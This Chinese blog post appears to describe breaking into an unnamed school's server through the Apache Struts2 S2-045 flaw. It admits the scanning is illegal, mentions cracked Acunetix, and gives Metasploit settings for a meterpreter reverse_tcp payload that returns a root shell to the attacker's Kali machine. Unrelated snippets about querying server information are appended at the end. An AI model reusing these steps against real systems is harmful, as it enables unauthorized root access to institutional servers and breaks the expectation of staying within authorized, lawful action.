獲取學校伺服器控制root權(S2 045漏洞下)

2021-09-24 11:17:44 字數 1186 閱讀 6522

掃瞄漏洞(非法)

這是非法的,所以,最好還是要有學校的書面授權~~~

之後,可以用掃瞄軟體進行web掃瞄,這裡web掃瞄使用的acunetix,如何安裝和安裝包及破解方法這裡不多說了。注意我這裡是專門利用

apache struts2 remote command execution (s2-045)

哪個學校不說了。

安裝kali

這裡可以安裝kali的vm版 ,簡單方便,也可以是u盤系統。安裝方法網上也多。要是電腦多或者要告別window的話,那就直接裝kali吧。

漏洞解析

s2-045 漏洞是17年3月被發現的巨大漏洞,處於struts2框架中,struts2官方緊急在凌晨發布漏洞公告,但是在國內依然存在很多機構依然沒有修復。

能力有限要看漏洞的原始碼解析請參見

由威脅情報中心nti關於struts2漏洞範圍分布圖

如何控制

之後輸入命令:

如果有圖形化介面可用用這個

然後設定屬性:

set payload linux/x86/meterpreter/reverse_tcp
set rhost 本機ip kali的
set rhosts 目標ip
set rport 80 //一般都是80埠 這是web層的
set targeturi /**** //'****' 代表的是那個頁面的相對路徑
set lport 44444 //這個可以預設
然後執行

run
就可以控制到伺服器了,而且是root許可權。

不要幹壞事!

希望還是管理員盡快修復,這漏洞可以直接拿到root權,特別重大的漏洞。

struts2 官方提供有漏洞修復辦法

獲取伺服器資訊

serveros environment.osversion.tostring 作業系統 cpusum environment.getenvironmentvariable number of processors cpu個數 cputype environment.getenvironmentva...

獲取伺服器資訊

label1.text 伺服器名稱 server.machinename 伺服器名稱 label2.text request.servervariables local addr 伺服器ip位址 label3.text 伺服器網域名稱 request.servervariables server n...

使用鏈結伺服器獲取遠端伺服器資料

首先新增鏈結伺服器,使用儲存過程sp addlinkedserver sp addlinkedserver server n remote server srvproduct n provider n sqloledb datasrc n 192.168.1.0 新增連線伺服器登入sp addlin...